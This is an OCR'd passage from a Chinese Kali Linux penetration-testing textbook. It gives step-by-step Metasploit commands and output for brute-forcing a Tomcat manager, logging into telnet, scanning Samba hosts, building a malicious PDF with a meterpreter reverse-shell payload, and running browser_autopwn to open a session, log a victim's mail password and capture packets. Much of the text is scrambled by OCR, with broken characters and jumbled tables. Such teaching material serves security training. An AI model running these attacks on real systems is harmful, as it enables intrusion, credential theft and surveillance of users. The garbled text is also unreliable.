[-] 192.168.41.142:8180 TOMCAT MGR - [18/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 


Application Manager] failed to login as 'both' 
[*] 192.168.41.142:8180 TOMCAT MGR - [58/63] - Trying username:'both' with password:'s3cret 
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[-] 192.168.41.142:8180 TOMCAT MGR - [58/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 


Application Manager] failed to login as 'both' 
[*] Scanned 1 of 1 hosts (10096 complete) 


[*] Auxiliary module execution completed 
以 上 输出 信息 显示 了 攻击 Tomcat 服务 的 一 个 过 程 。 从 输出 的 结 采 中 可 以 看 到 登录 
Tomcat 服务 的 用 户 名 和 密码 都 为 tomcat. 


6.4.4 ”渗透 攻击 Telnet 服务 


Telnet 服务 是 一 种 “客户 只/ 服务 器 ”架构 ， 在 整个 Telnet 运行 的 流程 染 构 中 一 定 包 括 
两 个 组 件 ， 分 别 是 Telnet JI 292881 Telnet Z vig. HF Telnet 是 使 用 明文 的 方式 传输 数据 
的 ， 所 以 并 不 安全 。 这 里 束 可 以 使 用 Metasplolit 中 的 一 个 模块 ， 可 以 破解 出 Telnet 服务 的 
用 户 名 和 密码 。 下 面 将 介绍 渗透 攻击 Telnet 服务 。 

(1) 启动 MSF 终端 。 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 
msf> 


(2) 使 用 telnet version 模块 ， 并 查看 可 配置 的 选项 参数 。 执 行 命令 如 下 所 示 : 


msf > use auxiliary/scanner/telnet/telnet_ version 
msf auxiliary(telnet_version) > show options 
Module options (auxiliary/scanner/telnet/telnet_version): 


Name Current Setting Required Description 

PASSWORD no The password for the specified username 
RHOSTS yes The target address range or CIDR identifier 
RPORT 23 yes The target port 

THREADS 1 yes The number of concurrent threads 
TIMEOUT 30 yes Timeout for the Telnet probe 

USERNAME no The username to authenticate as 


从 输出 的 信息 中 ， 可 以 看 到 有 四 个 必须 配置 选项 。 其 中 三 个 选项 已 经 配置 ， 现 在 配置 
RHOSTS 选项 。 
(3) 配置 RHOSTS 选项 ， 并 局 动 扫描 。 执 行 命令 如 下 所 示 : 


msf auxiliary(telnet_version) > set RHOSTS 192.168.6.105 

RHOSTS => 192.168.6.105 

msf auxiliary(telnet_version) > exploit 
[*] 192.168.6.105:23 TELNET _ 


ee |) 用 ae epee Le ee eco, ee ee | 
| ES a e E a a a S e a a E a 
\x0a|_| L] B SM CES PS E, -__/|_|\__/|_I_\___|L-_/I_N__|__x0a 
B \xOa\x0a\xOaWarning: Never expose this VM to 
an untrusted  network'xOawOaContact §msfdev[at]metasploit.com\xOa\xOaLogin with 
msfadmin/msfadmin to get started\x0a\x0a\xOametasploitable login: 
[*] Scanned 1 of 1 hosts (10096 complete) 


[*] Auxiliary module execution completed 


从 以 上 输出 的 信息 , 仅 看 到 一 堆 文本 信息 。 但 是 在 这 些 信 息 中 可 以 看 到 , 显示 了 Telnet 
的 登录 认证 信息 Login with msfadmin/msfadmin to get started。 从 这 条 信息 中 ， 可 以 得 知 目 
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标 主 机 Telnet 服务 的 用 户 名 和 密码 都 为 msfadmin。 此 时 可 以 尝试 登 
(4) 登录 目标 主机 的 Telnet 服务 。 执 行 命令 如 下 所 示 : 


root@kali:~# telnet -| msfadmin 192.168.6.105 

Trying 192.168.6.105... 

Connected to 192.168.6.105. 

Escape character is 人 ] 

Password: # 输 入 密码 msfadmin 

Last login: Tue Jul 8 06:32:46 EDT 2014 on tty1 

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 
The programs included with the Ubuntu system are free software; 

the exact distribution terms for each program are described in the 

individual files in /usr/share/doc/*/copyright. 

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by 
applicable law. 

To access official Ubuntu documentation, please visit: 

http://help.ubuntu.com/ 

No mail. 

msfadmin@metasploitable:~$ 


以 上 信息 显示 了 登录 Telnet 服务 的 信息 。 在 输出 信息 中 看 到 
msfadmin@metasploitable:~$ 提 示人 符 ， 则 表示 成 功 登 录 了 Telnet 服务 。 此 时 可 以 执行 一 些 标 
MEN) Linux 命令 。 例 如 ， 查 看 多 个 组 的 成 员 ， 执 行 命令 如 下 所 示 : 


msfadmin@metasploitable:~$ id 


uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom), 
25(floppy),29(audio),30(dip),A44(video),46(plugdev), 107(fuse),111(lpadmin),112(admin),119(samb 
ashare), 1000(msfadmin) 


输出 信息 中 显示 了 msfadmin 用 户 的 相关 信息 。 其 中 ，gid 表示 groups 中 第 1 个 组 账号 
为 该 用 户 的 基本 组 ，groups 中 的 其 他 组 账号 为 该 用 户 的 附加 组 。 


6.4.5 渗透 攻击 Samba 服务 


Samba 是 一 套 实现 SMB (Server Messages Block) 协议 、 足 平台 进行 文件 共享 和 打印 
共享 服务 的 程序 。Samba 服务 对 应 的 端口 有 139 和 445 等 ， 只 要 开启 这 些 端口 后 ， 主 机 就 
可 能 存在 Samba 服务 远程 洲 出 漏 铜 。 下 面 将 介绍 渗透 攻击 Samba 服务 器。 

(1) JH SJ MSF imo AUT aT Ub P HIA: 


root@kali:~# msfconsole 
msf> 


(2) 使 用 smb version 模块 ， 并 查看 该 模块 可 配置 的 选项 参数 。 执 行 命令 如 下 所 示 : 


msf > use auxiliary/scanner/smb/smb_version 
msf auxiliary(smb version) > show options 
Module options (auxiliary/scanner/smb/smb version): 


Name Current Setting Tesque Description 

RHOSTS yes The target address range or CIDR identifier 
SMBDomain WORKGROUP no The Windows domain to use for authentication 
SMBPass no The password for the specified username 
SMBUser no The username to authenticate as 

THREADS 1 yes The number of concurrent threads 


ale EE 
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(3 六 配置 RHOSTS 选项 。 执 行 命令 如 下 所 示 : 


msf auxiliary(smb_version) > set RHOSTS 192.168.6.105 
RHOSTS => 192.168.6.105 


(4) 月 动 扫描。 执行 命令 如 下 所 示 : 


msf auxiliary(smb_version) > exploit 
[*] 192.168.6.105:445 is running Unix Samba  3.0.20-Debian (language: Unknown) 


(domain. WORKGROUP) 
[*] Scanned 1 of 1 hosts (100% complete) 


[*] Auxiliary module execution completed 


从 输出 的 信息 中 ， 可 以 看 到 扫描 到 正在 运行 的 Samba 服务 器 及 其 版 本 。 

在 Metasploit 中 使 用 smb_version 模块 ， 还 可 以 指定 扫描 某 个 网 络 内 所 有 运行 Samba 
服务 器 的 主机 。 下 面 将 介绍 扫描 192.168.6.0/24 网 络 内 开启 Samba 服务 器 的 所 有 主机 。 

(1) 选择 使 用 smb_version 模块 。 执 行 命令 如 下 所 示 : 


msf > use auxiliary/scanner/smb/smb_ version 


(2) 配置 smb version 模块 中 可 配置 的 选项 参数 。 执 行 命令 如 下 所 示 : 


msf auxiliary(smb_version) > set RHOSTS 192.168.6.0/24 
RHOSTS => 192.168.6.0/24 

msf auxiliary(smb_version) > set THREADS 255 
THREADS => 255 


(3) AIAH. ATMU FR: 


msf auxiliary(smb_version) > exploit 

[*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: 
Unknown) (name:WIN-RKPKQFBLG6C) (domain: WORKGROUP) 

[*] 192.168.6.105:445 is running Unix Samba _ 3.0.20-Debian (language: Unknown) 
(domain:WORKGROUP) 

[*] 192.168.6.104:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) 


(name:LYW) (domain:L YW) 
[*] 192.168.6.110:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) 


(name:AA-8860KJM26F SW) (domain: WORKGROUP) 
[*] Scanned 255 of 256 hosts (09996 complete) 


[*] Scanned 256 of 256 hosts (10096 complete) 
[*] Auxiliary module execution completed 


从 输出 的 信息 中 ， 可 以 看 到 192.168.6.0/24 网 络 内 有 四 台 主 机 上 正在 运行 厦 Samba 服 


务 器 。 在 显示 的 信息 中 ， 可 以 看 到 运行 Samba 服务 器 的 操作 系统 类 型 。 扫 描 到 开启 Samba 
IRA ae HED, in] ETA BoE T o 


6.4.6 PDF 文件 攻击 


PDF 是 一 种 文件 格式 ， 该 文件 的 使 用 比较 广泛 ， 并 且 容 易 传输 。 通 常 在 工作 中 ， 用 户 
都 是 从 工作 程序 中 打开 了 一 个 合法 的 PDF 文档 。 当 打开 该 文档 时 ， 该 用 户 的 主机 就 有 可 能 
被 攻击 。Metasploit 提供 了 一 个 渗透 攻击 模块 ， 可 以 来 创建 一 个 攻击 载荷 ， 通 过 传递 该 攻 
击 载荷 对 目标 系统 进行 渗透 攻击 。 本 小 节 将 介绍 创建 PDF 文件 攻击 载荷 。 

创建 PDF 文件 的 具体 操作 步骤 如 下 所 示 。 
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(了 > 启动 MSFCONSOLE。 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


(2) 搜索 所 有 有 效 的 PDF 模块 。 执 行 命令 如 下 所 示 : 
msf exploit(adobe pdf embedded exe) > search pdf 


Matching Modules 


auxiliary/admin/http/typo3 sa 2010 020 
Remote File 


auxiliary/admin/sap/sap configservlet exec _ 
Command 

noauth 
auxiliary/admin/webmin/edit html fileaccess 
file Parameter 


Access 
auxiliary/dos/http/3com superstack switch 
Switch Denial of 


auxiliary/dos/http/hashcollision dos 
auxiliary/dos/scada/igss9 dataserver 


DoS 
auxiliary/dos/upnp/miniupnpd dos 
of Service (DoS) 


exploit/windows/http/sap configservlet - 
Remote Code 

exec noauth 
exploit/windows/http/sonicwall scrutinizer sqli 
Scrutinizer 9 


exploit/windows/misc/avidphoneticindexer 
5.5 - Avid 


exploit/windows/misc/poisonivy bof 
Server Buffer 


exploit/windows/fileformat/adobe pdf _ 
EXE Social 

embedded exe 
exploit/windows/oracle/tns service name 


exploit/windows/postgres/postgres payload 
Microsoft Windows 


exploit/windows/scada/abb wserver exec 
wserver.exe 


exploit/windows/scada/citect scada odbc 
CitectSCADA/CitectFacilities ODBC 


Disclosure Date 


Rank Description 
normal TYPO3 sa-2010-020 
Disclosure 
2012-11-01 normal SAP ConfigServlet OS 
00:00:00 UTC Execution 
2012-09-06 normal Webmin edit html.cgi 
00:00:00 UTC Traversal Arbitrary File 
2004-06-24 normal 3Com SuperStack 
00:00:00 UTC Service 
2011-12-28 normal Hashtable Collisions 
00:00:00 UTC 
2011-12-20 normal /-Technologies IGSS 9 
00:00:00 UTC IGSSdataServer.exe 
2013-03-27 normal MiniUPnPd 1.4 Denial 
00:00:00 UTC Exploit 
2012-11-01 great SAP ConfigServlet 
Execution 
2012-07-22 excellent Dell SonicWALL (Plixer) 
SQL Injection 
2011-11-29 normal Avid Media Composer 
Phonetic Indexer Buffer Overflow 
2012-06-24 | normal Poison Ivy 2.3.2 C&C 
Overflow 
2010-03-29 excellent Adobe PDF Embedded 
Engineering 
2002-05-27 . good Oracle 8i TNS Listener 
SERVICE NAME Buffer Overflow 
2009-04-10 | excellent PostgreSQL for 
Payload Execution 
2013-04-05 . excellent ABB MicroSCADA 
Remote Code Execution 
2008-06-1 1 normal 


Buffer Overflow 


以 上 输出 信息 显示 了 PDF 所 有 可 用 的 模块 。 此 时 可 以 选择 相应 模块 进行 配置 ,配置 后 
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方便 进行 攻击 。 


(3) 使 用 Adobe PDF Embedded EXE 模块 。 执 行 命令 如 下 所 示 : 


msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe 


(4) 查看 adobe pdf embedded exe 模块 有 效 的 选项 。 执 行 命令 如 下 所 示 : 


msf exploit(adobe_pdf_embedded_exe) > show options 
Module options (exploit/windows/fileformat/adobe_pdf_embedded_ exe): 


Name Current Setting Required Description 
EXENAME no The Name of payload exe. 
FILENAME evil.pdf no The output filename. 
INFILENAME yes The Input PDF filename. 


LAUNCH MESSAGE To view the encrypted content please tick the "Do not show this 
message again" box and press Open. 
no The message to display in the File: 
area 
Exploit target: 
Id Name 


O Adobe Reader v8.x, v9.x (Windows XP SP3 English/Spanish) 
以 上 信息 显示 了 adobe pdf embedded _ exe 模块 押 有 可 用 的 选项 ,此 时 配置 必须 的 选项 ， 


然后 进行 渗透 攻击 。 


执行 


(5) 设置 用 户 想 要 生成 的 PDF 文件 名 。 执 行 命令 如 下 所 示 : 

msf exploit(adobe pdf embedded exe) > set FILENAME evildocument.pdf 

FILENAME => evildocument.pdf 

(6) 设置 INFILENAME isin. TAH, EA ee a EA Vill) PDF 文件 位 置 。 
J 命令 如 下 所 示 : 


msf exploit(adobe pdf embedded exe) > set INFILENAME /root/Desktop/ willie.pdf 
INFILENAME => /root/Desktop/willie.pdf 


(7) 运行 exploit。 执 行 命令 如 下 所 示 : 


msf exploit(adobe pdf embedded exe) > exploit 
[*] Reading in '/root/Desktop/willie.pdf... 


[*] Parsing "/root/Desktop/willie.pdf ... 

[*] Using 'windows/meterpreter/reverse tcp' as payload... 

[*] Parsing Successful. Creating 'evildocument.pdf file... 

[+] evildocument.pdf stored at /root/.msf4/local/evildocument.pdf 


输出 的 信息 显示 了 evildocument.pdf 文件 已 经 生成 , 而 且 被 保存 到 /oot.msf4/local 目录 中 。 


6.4.7 使 用 browser_autopwn 模块 渗透 攻击 浏览 


Browser Autopwn 是 由 Metasploit 提供 的 一 个 辅助 模块 。 当 访问 一 个 Web 页 面 时 ， 它 


允许 用 户 自 动 地 攻击 一 个 入 侵 主 机 。Browser Autopwn 在 攻击 之 前 ， 会 先进 行 指 纹 信 息 操 
VE, 这 意味 看 它 不 会 攻击 Mozilla Firefox 浏览 器 , fl Hx Ji KA A ‘iv HY Internet Explorer 7 


浏览 


全 器 。 本 小 和 将 介绍 browser autopwn 模块 的 使 用 。 
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加 载 browser autopwn 模块 的 具体 操作 步骤 如 下 所 示 。 
(1) 启动 MSFCONSOLE。 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


(2) 查询 autopwn 模块 。 


msf > search autopwn 
Matching Modules 


Name Disclosure Date Rank Description 


auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter 
输出 的 信息 显示 了 有 一 个 autopwn 模块 。 
(3) 使 用 browser autopwn 模块 。 执 行 命令 如 下 所 示 : 
msf > use auxiliary/server/browser_autopwn 
执行 以 上 命令 后 ， 没有 任何 信息 输出 。 
(4) 设置 payload。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser autopwn) > set payload windows/meterpreter/ reverse tcp 
payload => windows/meterpreter/reverse tcp 


(5) 查看 payload 的 选项 。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > show options 
Module options (auxiliary/server/browser_autopwn): 


Name Current Setting Required Description 
LHOST 192.168.41.234 yes The IP address to use for reverse-connect 
payloads 
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an 
address on the local machine or 0.0.0.0 
SRVPORT 8080 yes The local port to listen on. 
SSL false no Negotiate SSL for incoming connections 
SSLCert no Path to a custom SSL certificate (default is 
randomly generated) 
SSLVersion SSL3 no Specify the version of SSL that should be used 
(accepted: SSL2, 

SSL3, TLS1) 

URIPATH no The URI to use for this exploit (default is random) 


输出 的 信息 显示 了 payload 模块 的 选项 。 此 时 就 可 以 选择 需要 设置 的 选项 进行 配置 。 
(6) 配置 LHOST 选项 。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > set LHOST 192.168.41.234 
LHOST => 192.168.41.234 


以 上 输出 的 信息 表示 指定 本 地 主机 使 用 的 IP 地 址 是 192.168.41.234。 
(7) 配置 URIPATH 选项 。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser autopwn) > set URIPATH "filetypes' 
URIPATH => filetypes 


(8) 局 用 渗透 攻击 。 执 行 命令 如 下 所 示 : 


msf auxiliary(browser_autopwn) > exploit 
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[*] Auxiliary module execution completed 

[*] Setup 

[*] Obfuscating initial javascript 2014-04-30 19:00:49 +0800 
[*] Done in 0.718574284 seconds 


msf auxiliary(browser autopwn) > 
[*] Starting exploit modules on host 192.168.41.234... 


[*] aoe 

[*] Starting exploit multi/browser/java atomicreferencearray with payload java/meterpreter/ 
reverse_tcp 

[*] Using URL: http://0.0.0.0:8080/BjlwyixpeQHIG 

[*] Local IP: http://192.168.41.234:8080/BjlwyiXpeQHIG 

[*] Server started. 

[*] Starting exploit multi/browser/java jre17 jmxbean with payload java/meterpreter/reverse tcp 
[*] Using URL: http://0.0.0.0:8080/NVVrXNZ 

[*] Local IP: http://192.168.41.234:8080/NVVrxNZ 

[*] Server started. 

.… 省 略 部 分 内 容 .… 

[*] Started reverse handler on 192.168.41.234:6666 

[*] Started reverse handler on 192.168.41.234:7777 

[*] Starting the payload handler... 

[*] Starting the payload handler... 

[*] --- Done, found 16 exploit modules 

[*] Using URL: http://0.0.0.0:8080/filetypes 

[*] Local IP: http://192.168.41.234:8080/filetypes 

[*] Server started. 

[*] 192.168.41.146 | browser autopwn - Handling '/filetypes' 35 ENA Zr PP s 

[*] 192.168.41.146 . browser autopwn - Handling ‘/filetypes' 

[*] Meterpreter session 1 opened (192.168.41.234:3333 -> 192.168.41.146:1073) at 


2014-04-30 19:16:54 *0800 
[*] Sending stage (769024 bytes) to 192.168.41.146 


[+] Session ID 1 01(192.168.41.234:3333 ->  192.168.41.146:1071) processing 


InitialAutoRunScript ‘migrate -f 
[+] Successfully migrated to process 
[*] Current server process: qjRc.exe (1824) 


[*] Spawning notepad.exe process to migrate to 
[+] Migrating to 1260 


以 上 输出 信息 是 一 个 漏洞 攻击 过 程 。 此 过 程 中 输出 的 内 容 较 多 ， 由 于 篇 幅 的 原因 ， 中 
间 部 分 内 容 使 用 省 略 号 〈.…) 取代 了 。 从 输出 的 过 程 中 看 到 客户 并 192.168.41.146 访问 了 
192.168.41.234 主机 ， 并 成 功 建立 了 一 个 活跃 的 会 话 。 该 会 话 是 由 客户 端 访问 后 产生 的 。 
23:235 din JG, ETE P mi IE vU Vs HA http://IP Address:8080/filetypes 访问 主机 ， 
将 产生 活跃 的 会 话 。 

(9) 从 第 (8) 步 的 输出 结 昌 中 可 以 看 到 ， 成 功 建立 的 会 话 ID 为 1。 为 了 激活 此 会 话 ， 
执行 命令 如 下 所 示 : 


msf auxiliary(browser autopwn) > sessions -i 1 
[*] Starting interaction with 1... 


meterpreter > 
从 输出 的 结果 中 可 以 看 到 ， 局 动 了 交互 会 话 1 进入 到 了 Meterpreter 命令 行 。 
(10) AA HEI 1T I] Meterpreter 命令 列表 。 执 行 命令 如 下 所 示 : 


meterpreter > help 


"Im 


Core Commands 


Command 


? 


background 


bgkill 
bglist 
bgrun 
channel 
close 


disable_unicode_encoding 
enable_unicode_encoding 


exit 
help 
info 
interact 
irb 

load 
migrate 
quit 
read 
resource 
run 

use 
write 
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qk 


Description 

Help menu 

Backgrounds the current session 

Kills a background meterpreter script 

Lists running background scripts 

Executes a meterpreter script as a background thread 
Displays information about active channels 
Closes a channel 

Disables encoding of unicode strings 
Enables encoding of unicode strings 
Terminate the meterpreter session 

Help menu 

Displays information about a Post module 
Interacts with a channel 

Drop into irb scripting mode 

Load one or more meterpreter extensions 
Migrate the server to another process 
Terminate the meterpreter session 

Reads data from a channel 

Run the commands stored in a file 
Executes a meterpreter script or Post module 
Deprecated alias for ‘load’ 

Writes data to a channel 


Command 
arp 
getproxy 
ifconfig 
ipconfig 
netstat 
portfwd 
route 


Description 

Display the host ARP cache 

Display the current proxy configuration 
Display interfaces 

Display interfaces 

Display the network connections 
Forward a local port to a remote service 
View and modify the routing table 


Stdapi: System Commands 


Command 


clearev 
drop_token 
execute 
getenv 
getpid 
getprivs 
getuid 

kill 

ps 

reboot 

reg 
rev2self 
shell 
shutdown 
steal_token 
suspend 


Description 


Clear the event log 

Relinquishes any active impersonation token. 

Execute a command 

Get one or more environment variable values 

Get the current process identifier 

Attempt to enable all privileges available to the current process 
Get the user that the server is running as 


Terminate a process 

List running processes 

Reboots the remote computer 

Modify and interact with the remote registry 

Calls RevertToSelf() on the remote machine 

Drop into a system command shell 

Shuts down the remote computer 

Attempts to steal an impersonation token from the target process 
Suspends or resumes a list of processes 


"Ens 
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sysinfo Gets information about the remote system, such as OS 
Stdapi: User interface Commands 


Command Description 

enumdesktops List all accessible desktops and window stations 

getdesktop Get the current meterpreter desktop 

idletime Returns the number of seconds the remote user has been idle 
keyscan_dump Dump the keystroke buffer 

keyscan_start Start capturing keystrokes 

keyscan_stop Stop capturing keystrokes 

screenshot Grab a screenshot of the interactive desktop 

setdesktop Change the meterpreters current desktop 

uictl Control some of the user interface components 


Priv: Timestomp Commands 


Command Description 


timestomp Manipulate file MACE attributes 


输出 的 信息 显示 了 Meterpreter 命令 行 下 可 运行 的 所 有 命令 。 输 出 的 信息 中 ， 每 个 命令 
的 作用 都 有 详细 的 描述 。 用 户 可 以 根据 目 己 的 情况 ， 执 行 相应 的 命令 。 
(11) 启动 键盘 输入 ， 执 行 命令 如 下 所 示 : 


meterpreter > keyscan_ start 
Starting the keystroke sniffer... 


(12) 获取 键盘 输入 信息 ， 执 行 命 令 如 下 所 示 : 


meterpreter > keyscan_dump 

Dumping captured keystrokes... 

«Back» «Back» «Back» «Back» <N1> <NO> <N1> <N2> <NO> <N/> = <N3> 
«N5» <N5> <N4> «Back» «Back» «Back» «Back» <Back> mail.qq.com «Return» 
<N1> <N2> <N3> <N4> <N5> <N6> <N7> <N8> <N9> <N1> 123456 «Return» 


输出 的 信息 显示 了 客户 端 在 浏览 器 中 输入 的 所 有 信息 。 如 访问 了 mailqq.com 网 站 ， 
登录 的 邮箱 地 址 为 1234567891, 244 123456, 


6.4.8 在 Metasploit 中 捕获 包 


在 Metasploit 中 ， 通 过 使 用 模块 进行 渗透 攻击 可 以 获取 到 一 个 Meterpreter Shell。 在 
Meterpreter Shell 中 ， 可 以 捕获 目标 系统 中 的 数据 包 。 下 面 将 介绍 如 何在 Metasploit 中 捕获 
数据 包 。 

C1) 首先 要 确定 获取 到 一 个 活跃 的 会 话 , 并 有 一 个 连接 到 目标 主机 的 Meterpreter Shell. 
下 面 是 Windows 7 连接 到 攻击 主机 的 一 个 Meterpreter Shell， 如 下 所 示 : 

msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.6.103:4444 

[*] Starting the payload handler... 

[*] Sending stage (769536 bytes) to 192.168.6.110 


[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.110:2478) at 2014-07-17 


10:44:47 +0800 
meterpreter > 


从 输出 的 信息 中 ， 可 以 看 到 成 功 的 打开 了 一 个 Meterpreter 会 话 。 接 下 来 ， 束 可 以 使 用 
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run packetrecorder 命令 捕获 目标 系统 的 数据 包 了 。 
(2) 但 看 packetrecorder 命令 的 参数 。 执 行 命令 如 下 所 示 : 


meterpreter > run packetrecorder 
Meterpreter Script for capturing packets In to a PCAP file 
on a target host given a interface ID. 
OPTIONS: 
-h Help menu. 
-| «opt» Interface ID number where all packet capture will be done. 
-| «opt» Specify and alternate folder to save PCAP file. 
-li List interfaces that can be used for capture. 
-t «opt» Time interval in seconds between recollection of packet, default 30 seconds. 


以 上 输出 的 信息 显示 run packetrecorder 命令 的 作用 和 可 用 选项 参数 。 在 捕获 数据 前 ， 
首先 要 指定 捕获 接口 。 所 以 ， 需 要 得 看 主机 中 可 用 的 捕获 接口 。 
(3) 得 看 可 用 的 捕获 网 络 接口 。 执 行 命令 如 下 所 未 : 


meterpreter > run packetrecorder -li 
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) 


从 输出 的 信息 中 ， 可 以 看 到 只 有 一 个 网 络 接口 。 
C4) 指定 捕获 接口 开始 捕获 数据 ， 并 将 捕获 的 文件 保存 到 果 面 上 。 执行 命令 如 下 所 示 : 


meterpreter > run packetrecorder -i 1 -| /root/Desktop 
[*] Starting Packet capture on interface 1 


[+] Packet capture started 
[*] Packets being saved in to /root/Desktop/logs/packetrecorder/ AA-8860KJM26FSW 


20140717.2700/AA-8860KJM26FSW 20140717.5608.cap 
[*] Packet capture interval is 30 Seconds 


AC 
[*] Interrupt 
[+] Stopping Packet sniffer... 


执行 以 上 命令 后 ， 将 开始 捕获 目标 主机 的 数据 。 捕 获 的 文件 将 会 保存 到 指定 位 置 的 一 
个 logs 目录 中 。 以 上 捕获 过 程 不 会 自动 停止 ， 如 果 要 停止 ， 则 按 下 Ctrl+C AF 

在 Metasploit 中 捕获 的 数据 包 , 可 以 使 用 Wireshark 工具 打开 并 进行 分 析 。 在 Kali Linux 
中 ， 默 认 已 经 安装 了 Wireshark 工具 。 

【实例 6-3】 下 面 演 示 使 用 Wireshark LH, 打开 捕获 的 文件 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 局 动 Wireshark， 使 它 在 后 台 和 运行。 执行 命令 如 下 所 示 : 

root@kali:~# wireshark & 


或 者 在 图 形 界面 依次 选择 “应 用 程序 ”|Kali Linux|Top 10 Security Tools|wireshark 命令 ， 
将 显示 如 图 6.16 所 示 的 界面 。 


Lua: Error during loading: 

o [string "/usr/share/wireshark/init.Lua"]:46: dofile has been disabled due to running 
Wireshark as superuser, See http://wiki.wireshark.org/CaptureSetup/ 
CapturePriviLeges for help in running Wireshark as an unprivileged user. 


_ 确 定 (0) 


图 6.16 警告 信息 
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《2 六 该 界面 显示 的 警告 信息 是 因为 当前 使 用 超级 用 户 运行 该 程序 的 。 此 时 单 击 “ 确 定 ” 
按钮 ， 将 显示 如 图 6.17 所 示 的 界面 。 


The Wireshark Network Analyzer [Wireshark 1.10.2 (SVN Rev 51934 from B= [= = 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
eeo4m.|mxGcei««»^ v EX 


Filter: w Expression... v 


_ 7 The World's Most Popular Network Proto 
WIRESHARK Version 1.10.2 (SVN Rev 51934 from /trunk-1.10) 


Capture | 


_ Interface List 品 Open 


© Live List of the capture interfaces Opena previously captured file 
(counts incoming packets) 


Open Recent: 
a Start /root/Desktop/logs/p ... 7.0855/A/ 


Choose one or more interfaces to capture from, then Start IrantiNecktan/lnacsin 7 SAORIAL 


Ready to load or capture » 3 Profile: Default 


图 6.17 Wireshark 主 界面 


(3) FP wi xe Wireshark 的 主 界 面 。 此 时 在 染 单 栏 中 依次 选择 FilelOpen 命令 ， 选 择 
要 打开 的 捕获 文件 。 打 开 捕 获 文 件 ， 界 面 如 图 6.18 所 示 。 


AA-8860KJM26FSW.20140717.5608.cap [Wireshark 1.10.2 (SVN Rev 51934 from /trunk-1.10)] 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
ClO a Went Ge a ee FH BA o oonga 


Filter: | ftp v | Expression... Clear Apply 保存 


No. Time Source Destination | Protocol Lengtl Info 
19 5.000000 192.168.6.112 192.168.6.110 74 Response: 220 (vsFTPd 2.2.2) 
27 9.000000 ^ 192.168.6.110 192.168.6.112 70 Request: USER anonymous 
29 9.000000 . 192.168.6.112 192.168.6.110 88 Response: 331 Please specify the password. 
78 21.000000 192.168.6.118 192.168.6.112 80 Request: PASS mozilla@example.com 
79 21.000000 192.168.6. 192.168.6.110 77 Response: 230 Login successful. 
95 24.000000  192.168.6.110 192.168.6.112 80 Request: PORT 192,168,6,110,11,54 
96 24.000000 192.168.6. 192.168.6.110 105 Response: 200 PORT command successful. Consider usinc 
97 24.000000  192.168.6.110 192.168.6.112 60 Request: LIST 
110 93 Response: 150 Here comes the directory listing. 
110 Response: 226 Directory send OK. 
112 Request: CWD pub 
118 Response: 250 Directory successfully changed. 
112 Request: PORT 192,168,6,110,11,55 
110 Response: 200 PORT command successful. Consider usind 
112 Request: LIST 
110 Response: 150 Here comes the directory listing. 
118 Response: 226 Directory send OK. 


105 24.000000 192.168.6. 
111 26.000000 192.168. 
112 26.000000 192.168. 
118 28.000000 192.168. 
119 28.000000 .168. 2 192.168. 
120 28.000000  192.168.6.110 192.168. 
124 28.000000  192.168.6. 
128 28.000000 192.168. 


192.168. 
.110 192.168. 
.112 192.168. 
.110 192.168. 


192.168. 
.112 192.168. 


6 
6 
6 
6 
6 
6 
6 
6 
101 24.000000 192.168.6.112 192.168. 
6 
6 
6 
6 
6 
6 
6 
6 


c^ c oc o C g^ Oc c cc ccc c^ c 
"XE uM Xe «Cs GUE ID IB 3998 000 XX XXE ÁO OREL 38 


@ Èf File: "/root/Desktop/logs/packetre... 3 Packets: 131 : Displayed; 17 (13.0%) - E Profile: Default 


图 6.18 捕获 的 数据 包 


(4) 从 该 界面 可 以 看 到 捕获 的 所 有 数据 包 。 在 Wireshark 中 ， 还 可 以 通过 使 用 各 种 显 
示 过 滤器 过 滤 一 类 型 的 数据 包 。 如 果 想 得 看 一 个 完整 的 会 话 ， 右 键 单 击 任何 一 行 并 选择 
Follow TCP Stream 命令 得 看 ， 如 图 6.19 所 示 。 
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| Follow TCP Stream EGA 


Stream Content 


220 (vsFTPd 2.2.2) 

USER anonymous 

331 Please specify the password. 

PASS mozilla@example.com 

230 Login successful. 

PORT 192,168,6,110,11,54 

200 PORT command successful. Consider using PASV. 
LIST 

150 Here comes the directory listing. 

226 Directory send OK 

CWD pub 

250 Directory rr ei M changed. 

PORT 192,168,6,110,11 

200 PORT command Seer: Consider using PASV. 
LIST 

150 Here comes the ala listing. 

226 Directory send OK 


| Entire conversation (457 bytes) v 


查找 (F) ”另存 为 (A) | 打印 (P) © ASCII © EBCDIC ™ Hex Dump © CArrays @ Raw 


帮助 (H) | Filter Out This Stream | 关闭 (5) 


图 6.19 FTP 会话 


(5) 该 界面 显示 了 一 个 完整 的 FTP 会 话 。 如 登录 FTP RAN AA. BAS. jn L1 
访问 的 目录 等 。 

在 Kali 中 ， 可 以 使 用 Xplico 工具 分 析 Wireshark 捕获 的 文件 。 但 是 ， 该 文件 的 格式 必 
须 是 .pcap。 该 工具 默认 在 Kali 中 没有 安装 ， 需 要 先 安装 才 可 以 使 用 。 下 面 将 介绍 安装 并 使 
用 Xplico 工具 分 析 数 据 包 。 

安装 Xplico 工具 。 执 行 命令 如 下 所 示 : 

root@kali:~# apt-get install xplico 

